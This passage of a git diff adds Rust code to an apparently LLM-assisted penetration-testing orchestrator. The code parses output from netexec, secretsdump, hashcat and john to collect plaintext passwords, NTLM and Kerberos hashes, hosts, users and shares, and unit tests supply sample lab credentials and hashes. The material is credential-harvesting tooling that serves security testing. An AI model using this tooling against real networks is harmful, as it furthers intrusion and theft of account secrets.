+            let host_col = caps.get(2).unwrap().as_str();
+            // Skip table header words
+            let skip = ["share", "name", "permissions", "remark"];
+            if skip.contains(&host_col.to_lowercase().as_str()) {
+                continue;
+            }
+            if seen.insert(ip.clone()) {
+                hosts.push(Host {
+                    ip,
+                    hostname: host_col.to_string(),
+                    os: String::new(),
+                    roles: vec![],
+                    services: vec![],
+                    is_dc: false,
+                    owned: false,
+                });
+            }
+        }
+    }
+
+    hosts
+}
diff --git a/ares-cli/src/orchestrator/output_extraction/mod.rs b/ares-cli/src/orchestrator/output_extraction/mod.rs
new file mode 100644
index 00000000..e428dcf2
--- /dev/null
+++ b/ares-cli/src/orchestrator/output_extraction/mod.rs
@@ -0,0 +1,160 @@
+//! Regex-based extraction of discoveries from raw tool output text.
+//!
+//! This is the orchestrator-level safety net that mirrors Python's
+//! `_process_output_text()` in `result_processing.py`. It parses raw
+//! text from task results to catch credentials, hashes, hosts, shares,
+//! and users that the per-tool parsers or LLM may have missed.
+//!
+//! The per-tool parsers in `ares_tools::parsers` are the primary extraction
+//! mechanism (they run at tool-call time). This module runs on the full task
+//! result text as a secondary pass.
+
+mod hashes;
+mod hosts;
+mod passwords;
+mod shares;
+#[cfg(test)]
+mod tests;
+mod users;
+
+use regex::Regex;
+use std::sync::LazyLock;
+
+use ares_core::models::{Credential, Hash, Host, Share, User};
+
+pub use hashes::{extract_cracked_passwords, extract_hashes};
+pub use hosts::extract_hosts;
+pub use passwords::extract_plaintext_passwords;
+pub use shares::extract_shares;
+pub use users::extract_users;
+
+/// Strip ANSI escape sequences from text (e.g., color codes from tool output).
+pub(crate) fn strip_ansi(s: &str) -> String {
+    static RE: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*m").unwrap());
+    RE.replace_all(s, "").into_owned()
+}
+
+/// All discoveries extracted from raw output text.
+#[derive(Debug, Default)]
+pub struct TextExtractions {
+    pub credentials: Vec<Credential>,
+    pub hashes: Vec<Hash>,
+    pub hosts: Vec<Host>,
+    pub users: Vec<User>,
+    pub shares: Vec<Share>,
+}
+
+impl TextExtractions {
+    pub fn is_empty(&self) -> bool {
+        self.credentials.is_empty()
+            && self.hashes.is_empty()
+            && self.hosts.is_empty()
+            && self.users.is_empty()
+            && self.shares.is_empty()
+    }
+}
+
+/// Extract all discoverable entities from raw output text.
+///
+/// Runs all extraction passes and returns the combined results.
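+///
+/// Minimal usage sketch (output snippet borrowed from the unit tests):
+///
+/// ```ignore
+/// let out = "CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::";
+/// let found = extract_from_output_text(out, "contoso.local");
+/// assert_eq!(found.hashes.len(), 1);
+/// assert!(found.credentials.is_empty());
+/// ```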
+pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { + let mut result = TextExtractions::default(); + if output.is_empty() { + return result; + } + + result.hosts = extract_hosts(output); + result.users = extract_users(output, default_domain); + result.credentials = extract_plaintext_passwords(output, default_domain); + result.shares = extract_shares(output); + result.hashes = extract_hashes(output, default_domain); + + let cracked = extract_cracked_passwords(output, default_domain); + result.credentials.extend(cracked); + + result +} + +/// Validate a credential pair — matches Python's add_credential() rejection checks. +pub(crate) fn is_valid_credential(username: &str, password: &str) -> bool { + if username.is_empty() || password.is_empty() { + return false; + } + if username.contains('/') || username.contains('\\') || username.ends_with(".txt") { + return false; + } + if password.contains('/') || password.contains('\\') || password.ends_with(".txt") { + return false; + } + let user_lower = username.to_lowercase(); + if matches!(user_lower.as_str(), "(none)" | "none" | "null" | "(null)") { + return false; + } + let user_upper = username.to_uppercase(); + if user_upper.starts_with("EVIL") && user_upper.ends_with('$') { + let middle = &user_upper[4..user_upper.len() - 1]; + if middle.chars().all(|c| c.is_ascii_digit()) { + return false; + } + } + let pw_lower = password.to_lowercase(); + if matches!( + pw_lower.as_str(), + "(null)" + | "(null:null)" + | "*blank*" + | "" + | "n/a" + | "[+]" + | "[-]" + | "password" + | "no" + | "yes" + | "true" + | "false" + | "unknown" + | "none" + | "null" + | "fail" + | "failed" + | "error" + | "status" + | "success" + | "enabled" + | "disabled" + | "required" + | "allowed" + | "denied" + ) { + return false; + } + if password.len() < 3 { + return false; + } + if password.len() > 128 { + return false; + } + if password.len() > 40 && password.chars().all(|c| c.is_ascii_hexdigit() || c == '$') { + return false; + } + true +} + +pub(crate) fn make_credential( + username: &str, + password: &str, + domain: &str, + source: &str, +) -> Credential { + Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + source: source.to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + } +} diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs new file mode 100644 index 00000000..2d06a50a --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -0,0 +1,178 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::Credential; + +use super::users::{RE_ACCOUNT, RE_DOMAIN_BACKSLASH, RE_UPN, RE_USER_BRACKET}; +use super::{is_valid_credential, make_credential}; + +static RE_DEFAULT_PASSWORD_CRED: LazyLock = + LazyLock::new(|| Regex::new(r"^([^\\]+)\\([^:]+):(.+)$").unwrap()); + +static RE_PASSWORD_VALUE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)Password\s*:\s*([^\s)]+)").unwrap()); + +static RE_SMB_TIMESTAMP_PASSWORD: LazyLock = LazyLock::new(|| { + Regex::new( + r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}.*(?i)Password\s*:\s*", + ) + .unwrap() +}); + +/// General nxc SMB line with a username field followed eventually by "Password": +/// `SMB IP PORT HOST username ... 
Password : xxx` +/// Broader than RE_SMB_TIMESTAMP_PASSWORD — doesn't require a timestamp. +static RE_SMB_LINE_PASSWORD: LazyLock = LazyLock::new(|| { + Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+.*(?i)Password\s*:\s*").unwrap() +}); + +/// Netexec [+] success line: `SMB IP PORT HOST [+] DOMAIN\user:password` +static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { + Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() +}); + +pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { + let mut credentials = Vec::new(); + let mut seen = std::collections::HashSet::new(); + + const FAILURE_MARKERS: &[&str] = &[ + "STATUS_LOGON_FAILURE", + "STATUS_PASSWORD_EXPIRED", + "STATUS_PASSWORD_MUST_CHANGE", + "STATUS_ACCOUNT_LOCKED_OUT", + "STATUS_ACCOUNT_DISABLED", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_NO_LOGON_SERVERS", + "STATUS_ACCESS_DENIED", + "STATUS_INVALID_LOGON_HOURS", + "STATUS_INVALID_WORKSTATION", + "LOGON FAILURE", + "LOGON_FAILURE", + "ACCESS_DENIED", + // Guest fallback — SMB accepted the connection but mapped it to the + // built-in Guest account. The supplied password was NOT validated. + "(GUEST)", + ]; + + for line in output.lines() { + let stripped = line.trim(); + if !stripped.contains("[+]") { + continue; + } + let upper = stripped.to_uppercase(); + if FAILURE_MARKERS.iter().any(|m| upper.contains(m)) { + continue; + } + if let Some(caps) = RE_NETEXEC_SUCCESS.captures(stripped) { + let domain = caps.get(1).unwrap().as_str().to_string(); + let user = caps.get(2).unwrap().as_str().to_string(); + let pass = caps + .get(3) + .unwrap() + .as_str() + .trim_end_matches("(Pwn3d!)") + .trim() + .to_string(); + if is_valid_credential(&user, &pass) { + let key = format!("{}\\{}:{}", domain, user, pass); + if seen.insert(key) { + credentials.push(make_credential(&user, &pass, &domain, "netexec_auth")); + } + } + } + } + let mut current_domain = default_domain.to_string(); + let mut expecting_default_password = false; + + let lines: Vec<&str> = output.lines().collect(); + for line in &lines { + let stripped = line.trim(); + + // DefaultPassword block + if stripped.contains("[*] DefaultPassword") { + expecting_default_password = true; + continue; + } + + if expecting_default_password { + expecting_default_password = false; + if let Some(caps) = RE_DEFAULT_PASSWORD_CRED.captures(stripped) { + let domain = caps.get(1).unwrap().as_str().to_string(); + let user = caps.get(2).unwrap().as_str().to_string(); + let pass = caps.get(3).unwrap().as_str().to_string(); + if is_valid_credential(&user, &pass) { + let key = format!("{}\\{}:{}", domain, user, pass); + if seen.insert(key) { + credentials.push(make_credential( + &user, + &pass, + &domain, + "autologon_registry", + )); + } + } + continue; + } + } + + // Track current domain context (for dedup key and credential domain). + // Only domain is tracked — username tracking was removed to prevent + // stale-context misattribution (LDAP doesn't guarantee attribute order). 
+        if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) {
+            current_domain = caps.get(1).unwrap().as_str().to_string();
+        } else if let Some(caps) = RE_UPN.captures(stripped) {
+            current_domain = caps.get(2).unwrap().as_str().to_string();
+        }
+
+        // Password extraction (only on lines containing "password")
+        if !stripped.to_lowercase().contains("password") {
+            continue;
+        }
+
+        if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) {
+            let password = caps
+                .get(1)
+                .unwrap()
+                .as_str()
+                .trim_end_matches(|c| ".,;:()".contains(c))
+                .trim_matches('\'')
+                .trim_matches('"')
+                .to_string();
+
+            // Extract username from the SAME line only. Never fall back to
+            // current_user — LDAP doesn't guarantee attribute order, so
+            // description may appear before sAMAccountName within an entry,
+            // causing stale current_user from a previous entry to be
+            // misattributed (e.g. john.smith:Summer2025 instead of
+            // sam.wilson:Summer2025). Per-tool parsers handle structured
+            // extraction; this safety net only catches same-line patterns.
+            let username = if let Some(smb_caps) = RE_SMB_TIMESTAMP_PASSWORD.captures(stripped) {
+                smb_caps.get(1).unwrap().as_str().to_string()
+            } else if let Some(smb_caps) = RE_SMB_LINE_PASSWORD.captures(stripped) {
+                smb_caps.get(1).unwrap().as_str().to_string()
+            } else if let Some(acct_caps) = RE_ACCOUNT.captures(stripped) {
+                acct_caps.get(1).unwrap().as_str().to_string()
+            } else if let Some(bracket_caps) = RE_USER_BRACKET.captures(stripped) {
+                bracket_caps.get(1).unwrap().as_str().to_string()
+            } else {
+                // No same-line username found — skip this password.
+                // The per-tool parser handles structured extraction.
+                continue;
+            };
+
+            if !username.is_empty() && is_valid_credential(&username, &password) {
+                let key = format!("{}\\{}:{}", current_domain, username, password);
+                if seen.insert(key) {
+                    credentials.push(make_credential(
+                        &username,
+                        &password,
+                        &current_domain,
+                        "description_field",
+                    ));
+                }
+            }
+        }
+    }
+
+    credentials
+}
diff --git a/ares-cli/src/orchestrator/output_extraction/shares.rs b/ares-cli/src/orchestrator/output_extraction/shares.rs
new file mode 100644
index 00000000..99556643
--- /dev/null
+++ b/ares-cli/src/orchestrator/output_extraction/shares.rs
@@ -0,0 +1,80 @@
+use regex::Regex;
+use std::sync::LazyLock;
+
+use ares_core::models::Share;
+
+static RE_SMB_IP: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^SMB\s+(\d+\.\d+\.\d+\.\d+)\s+").unwrap());
+
+static RE_SMB_PREFIX: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^SMB\s+\S+\s+\d+\s+\S+\s+").unwrap());
+
+pub fn extract_shares(output: &str) -> Vec<Share> {
+    let mut shares = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+    let mut current_ip = String::new();
+    let mut in_table = false;
+    let valid_perms = ["read", "write", "read,write", "write,read"];
+
+    for line in output.lines() {
+        let stripped = line.trim();
+
+        // Track current IP
+        if let Some(caps) = RE_SMB_IP.captures(stripped) {
+            current_ip = caps.get(1).unwrap().as_str().to_string();
+        }
+
+        // Strip SMB prefix to get body
+        let body = RE_SMB_PREFIX.replace(stripped, "").to_string();
+        let body = body.trim();
+
+        if body.is_empty() {
+            continue;
+        }
+
+        // Detect table header
+        let body_lower = body.to_lowercase();
+        if body_lower.starts_with("share") && body_lower.contains("permission") {
+            in_table = true;
+            continue;
+        }
+
+        // Skip separator lines
+        if body.chars().all(|c| c == '-' || c == ' ') {
+            continue;
+        }
+
+        if in_table && !current_ip.is_empty() {
+            // Table ends at enumeration summary or empty body
+
if body.starts_with('[') { + in_table = false; + continue; + } + + // Split on whitespace runs (columns are separated by multiple spaces) + let parts: Vec<&str> = body.split_whitespace().collect(); + if parts.len() >= 2 { + let share_name = parts[0].to_string(); + let perm = parts[1].to_lowercase(); + if valid_perms.contains(&perm.as_str()) { + let comment = if parts.len() >= 3 { + parts[2..].join(" ") + } else { + String::new() + }; + let key = format!("{}:{}", current_ip, share_name); + if seen.insert(key) { + shares.push(Share { + host: current_ip.clone(), + name: share_name, + permissions: perm.to_uppercase(), + comment, + }); + } + } + } + } + } + + shares +} diff --git a/ares-cli/src/orchestrator/output_extraction/tests.rs b/ares-cli/src/orchestrator/output_extraction/tests.rs new file mode 100644 index 00000000..003dc25c --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/tests.rs @@ -0,0 +1,538 @@ +use super::*; + +#[test] +fn test_extract_ntlm_with_domain() { + let output = + "CONTOSO\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); + assert_eq!(hashes[0].domain, "CONTOSO"); + assert_eq!(hashes[0].hash_type, "ntlm"); + assert!(hashes[0] + .hash_value + .contains("e19ccf75ee54e06b06a5907af13cef42")); +} + +#[test] +fn test_extract_ntlm_without_domain() { + let output = + "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); + assert_eq!(hashes[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_tgs_hash() { + let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "svc_sql"); + assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); + assert_eq!(hashes[0].hash_type, "kerberoast"); +} + +#[test] +fn test_extract_asrep_hash() { + let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456789012345678901234567890abcdef"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "jdoe"); + assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); + assert_eq!(hashes[0].hash_type, "asrep"); +} + +#[test] +fn test_extract_line_wrapped_ntlm() { + let output = + "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75\nee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); +} + +#[test] +fn test_extract_hashes_dedup() { + let output = "\ +CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n\ +CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1, "Should dedup identical hashes"); +} + +#[test] +fn test_extract_hosts_banner() { + let output = "SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].ip, "192.168.58.10"); + assert_eq!(hosts[0].hostname, "dc01.contoso.local"); // FQDN constructed from name+domain + 
assert!(hosts[0].is_dc); +} + +#[test] +fn test_extract_hosts_banner_fqdn_construction() { + // Verify FQDN is built from (name:X)(domain:Y) → x.y + let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:child.contoso.local) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "dc02.child.contoso.local"); + assert!(hosts[0].is_dc); +} + +#[test] +fn test_extract_hosts_banner_domain_trailing_zero() { + // netexec sometimes appends "0." to domain — verify it's stripped + let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:contoso.local0.) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "dc02.contoso.local"); +} + +#[test] +fn test_extract_hosts_simple() { + let output = "SMB 192.168.58.20 445 SRV01 some output"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].ip, "192.168.58.20"); + assert_eq!(hosts[0].hostname, "SRV01"); +} + +#[test] +fn test_extract_hosts_dedup() { + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Windows (name:DC01) (domain:contoso.local)\n\ +SMB 192.168.58.10 445 DC01 something else"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1, "Should dedup by IP"); + assert_eq!(hosts[0].hostname, "dc01.contoso.local"); +} + +#[test] +fn test_extract_users_domain_backslash() { + let output = "CONTOSO\\alice.johnson (SidTypeUser)"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "alice.johnson"); + assert_eq!(users[0].domain, "CONTOSO"); +} + +#[test] +fn test_extract_users_upn() { + let output = "Found user: bob@contoso.local"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "bob"); + assert_eq!(users[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_users_rpc_format() { + let output = "user:[admin] rid:[0x1f4]"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "admin"); + assert_eq!(users[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_users_samaccountname() { + let output = "sAMAccountName: svc_sql"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "svc_sql"); +} + +#[test] +fn test_extract_users_skip_machine_accounts() { + let output = "CONTOSO\\DC01$ (SidTypeUser)"; + let users = extract_users(output, "contoso.local"); + assert!( + users.is_empty(), + "Machine accounts (ending in $) should be skipped" + ); +} + +#[test] +fn test_extract_users_skip_anonymous() { + let output = "user:[anonymous] rid:[0x1f5]"; + let users = extract_users(output, "contoso.local"); + assert!(users.is_empty()); +} + +#[test] +fn test_extract_users_smb_timestamp() { + let output = "SMB 192.168.58.10 445 DC01 alice.johnson 2026-03-25 23:21:09 0 Alice"; + let users = extract_users(output, "contoso.local"); + assert!(users.iter().any(|u| u.username == "alice.johnson")); +} + +#[test] +fn test_extract_users_domain_context_propagation() { + let output = "\ +[*] Windows (name:DC01) (domain:north.contoso.local)\n\ +user:[alice] rid:[0x1f4]"; + let users = extract_users(output, "contoso.local"); + let alice = users.iter().find(|u| u.username == "alice").unwrap(); + assert_eq!(alice.domain, "north.contoso.local"); +} + +#[test] +fn test_extract_password_from_description() { + 
let output = + "SMB 192.168.58.10 445 DC01 dave.miller 2026-03-25 23:22:25 0 Dave Miller (Password : Summer2026!)"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "dave.miller"); + assert_eq!(creds[0].password, "Summer2026!"); +} + +#[test] +fn test_extract_default_password() { + let output = "\ +[*] DefaultPassword\n\ +CONTOSO\\svc_backup:BackupPass123!"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_backup"); + assert_eq!(creds[0].password, "BackupPass123!"); + assert_eq!(creds[0].domain, "CONTOSO"); +} + +#[test] +fn test_extract_password_rejects_paths() { + let output = "Password : /tmp/users.txt"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert!(creds.is_empty()); +} + +/// Regression: stale current_user must never be used for password attribution. +/// Previously, CHILD\john.smith on an earlier line would set current_user, and a +/// later "Password: Summer2025" (belonging to sam.wilson) would be falsely +/// attributed to john.smith. +/// +/// Fix: password lines without a same-line username are skipped entirely. +/// Per-tool parsers handle structured extraction (LDIF, nxc table format). +#[test] +fn test_stale_context_does_not_leak_across_passwords() { + // Simulate secretsdump output followed by LDAP description output + let output = "\ +CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123def456abc123def456abc123de:::\n\ +Password: Summer2025"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + // The password line has no same-line username, so it must be skipped. + // Per-tool parsers handle the structured extraction correctly. + assert!( + creds.is_empty(), + "bare Password: line must not produce credentials" + ); +} + +/// Regression: LDAP attribute order is NOT guaranteed. +/// description may appear BEFORE sAMAccountName within an entry. +/// extract_plaintext_passwords must never misattribute passwords from +/// a previous entry's username context. +#[test] +fn test_ldif_attribute_order_no_misattribution() { + // ldapsearch output where description comes BEFORE sAMAccountName + // and john.smith's entry appears before sam.wilson's + let output = "\ +# john.smith, Users, child.contoso.local\n\ +dn: CN=John Smith,CN=Users,DC=child,DC=contoso,DC=local\n\ +sAMAccountName: john.smith\n\ +description: John Smith\n\ +userPrincipalName: john.smith@child.contoso.local\n\ +\n\ +# sam.wilson, Users, child.contoso.local\n\ +dn: CN=Sam Wilson,CN=Users,DC=child,DC=contoso,DC=local\n\ +description: Sam Wilson (Password : Summer2025)\n\ +sAMAccountName: sam.wilson\n\ +userPrincipalName: sam.wilson@child.contoso.local"; + + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + // The description line has no same-line username — must be skipped. + // john.smith:Summer2025 must NEVER be produced. + assert!( + creds.is_empty(), + "LDIF description without same-line username must not produce credentials, got: {:?}", + creds + ); +} + +/// nxc SMB lines without timestamps should still extract via RE_SMB_LINE_PASSWORD. 
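+/// (passwords.rs tries RE_SMB_TIMESTAMP_PASSWORD first; this test exercises
+/// the broader fallback on a row that has no date column.)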
+#[test] +fn test_smb_line_without_timestamp() { + let output = + "SMB 192.168.58.10 445 DC01 svc_test 0 Service Account (Password : TestPass!)"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_test"); + assert_eq!(creds[0].password, "TestPass!"); +} + +/// Ensure that two separate tool outputs processed independently don't +/// cross-contaminate username context. +#[test] +fn test_separate_outputs_no_cross_contamination() { + // Tool output 1: secretsdump mentions john.smith + let output1 = "CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123:::\n"; + // Tool output 2: LDAP description with password for sam.wilson + let output2 = "SMB 192.168.58.22 445 DC02 sam.wilson 2026-04-13 Password: Summer2025"; + + // Process separately (as the fix does) + let creds1 = extract_plaintext_passwords(output1, "contoso.local"); + let creds2 = extract_plaintext_passwords(output2, "contoso.local"); + + // output1 should not produce a plaintext credential (it's a hash line) + assert!(creds1.is_empty()); + + // output2 should attribute Summer2025 to sam.wilson, not john.smith + assert_eq!(creds2.len(), 1); + assert_eq!(creds2[0].username, "sam.wilson"); + assert_eq!(creds2[0].password, "Summer2025"); +} + +#[test] +fn test_extract_shares() { + let output = "\ +SMB 192.168.58.10 445 DC01 Share Permissions Remark\n\ +SMB 192.168.58.10 445 DC01 ----- ----------- ------\n\ +SMB 192.168.58.10 445 DC01 SYSVOL READ Logon server share\n\ +SMB 192.168.58.10 445 DC01 ADMIN$ READ,WRITE\n\ +SMB 192.168.58.10 445 DC01 [*] Enumerated 2 shares"; + let shares = extract_shares(output); + assert_eq!(shares.len(), 2); + assert_eq!(shares[0].name, "SYSVOL"); + assert_eq!(shares[0].permissions, "READ"); + assert_eq!(shares[0].host, "192.168.58.10"); + assert_eq!(shares[1].name, "ADMIN$"); + assert_eq!(shares[1].permissions, "READ,WRITE"); +} + +#[test] +fn test_full_extraction() { + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)\n\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\:\n\ +SMB 192.168.58.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description-\n\ +SMB 192.168.58.10 445 DC01 alice 2026-03-25 23:21:09 0 Alice (Password : Welcome1!)\n\ +SMB 192.168.58.10 445 DC01 bob 2026-03-25 23:21:09 0 Bob\n\ +CONTOSO\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:313b6f423a71d74c0a1b8a2f43b22d4c:::"; + + let result = extract_from_output_text(output, "contoso.local"); + assert!(!result.hosts.is_empty(), "Should extract hosts"); + assert!(!result.users.is_empty(), "Should extract users"); + assert!(!result.credentials.is_empty(), "Should extract credentials"); + assert!(!result.hashes.is_empty(), "Should extract hashes"); +} + +#[test] +fn test_empty_output() { + let result = extract_from_output_text("", "contoso.local"); + assert!(result.is_empty()); +} + +#[test] +fn test_extract_netexec_success_credential() { + let output = "\ +SMB 192.168.58.11 445 DC02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC02) (domain:child.contoso.local) (signing:True)\n\ +SMB 192.168.58.11 445 DC02 [-] child.contoso.local\\admin:admin STATUS_LOGON_FAILURE\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; + + let result = extract_from_output_text(output, "child.contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].username, "jdoe"); + assert_eq!(result.credentials[0].password, "jdoe"); + 
assert_eq!(result.credentials[0].domain, "child.contoso.local"); + assert_eq!(result.credentials[0].source, "netexec_auth"); +} + +#[test] +fn test_extract_netexec_success_with_pwned() { + let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; + + let result = extract_from_output_text(output, "contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].username, "Administrator"); + assert_eq!(result.credentials[0].password, "P@ssw0rd"); +} + +#[test] +fn test_extract_netexec_guest_filtered() { + let output = "\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\admin:admin (Guest)\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe (Guest)\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\realuser:realpass"; + + let result = extract_from_output_text(output, "child.contoso.local"); + assert_eq!( + result.credentials.len(), + 1, + "Guest lines should be filtered out" + ); + assert_eq!(result.credentials[0].username, "realuser"); + assert_eq!(result.credentials[0].password, "realpass"); +} + +#[test] +fn test_valid_credential_rejects_null_usernames() { + assert!(!is_valid_credential("(none)", "pass")); + assert!(!is_valid_credential("none", "pass")); + assert!(!is_valid_credential("null", "pass")); + assert!(!is_valid_credential("(null)", "pass")); + assert!(!is_valid_credential("(None)", "pass")); +} + +#[test] +fn test_valid_credential_rejects_evil_artifacts() { + assert!(!is_valid_credential("EVIL625686$", "pass")); + assert!(!is_valid_credential("evil12345$", "pass")); + // Non-numeric middle should pass + assert!(is_valid_credential("EVILBOT$", "pass")); +} + +#[test] +fn test_valid_credential_rejects_noise_passwords() { + assert!(!is_valid_credential("user", "(null)")); + assert!(!is_valid_credential("user", "*BLANK*")); + assert!(!is_valid_credential("user", "")); + assert!(!is_valid_credential("user", "N/A")); + assert!(!is_valid_credential("user", "[+]")); + assert!(!is_valid_credential("user", "Password")); + assert!(!is_valid_credential("user", "password")); +} + +#[test] +fn test_valid_credential_accepts_real_passwords() { + assert!(is_valid_credential("admin", "P@ss1")); + assert!(is_valid_credential("jdoe", "jdoe")); + assert!(is_valid_credential("svc_test", "svc_test")); +} + +#[test] +fn test_extract_cracked_tgs_hashcat() { + let output = + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456:Summer2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_sql"); + assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].source, "cracked:hashcat"); +} + +#[test] +fn test_extract_cracked_asrep_hashcat() { + let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456:Winter2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); + assert_eq!(creds[0].password, "Winter2024!"); + assert_eq!(creds[0].source, "cracked:hashcat"); +} + +#[test] +fn test_extract_cracked_john_show() { + let output = "svc_sql:Summer2024!::::::::\n1 password hash cracked, 0 left"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_sql"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].source, "cracked:john"); +} + 
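+// Note: john --show output is parsed only when the "password hash cracked"
+// summary line is present (see test_extract_cracked_john_not_triggered_without_context).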
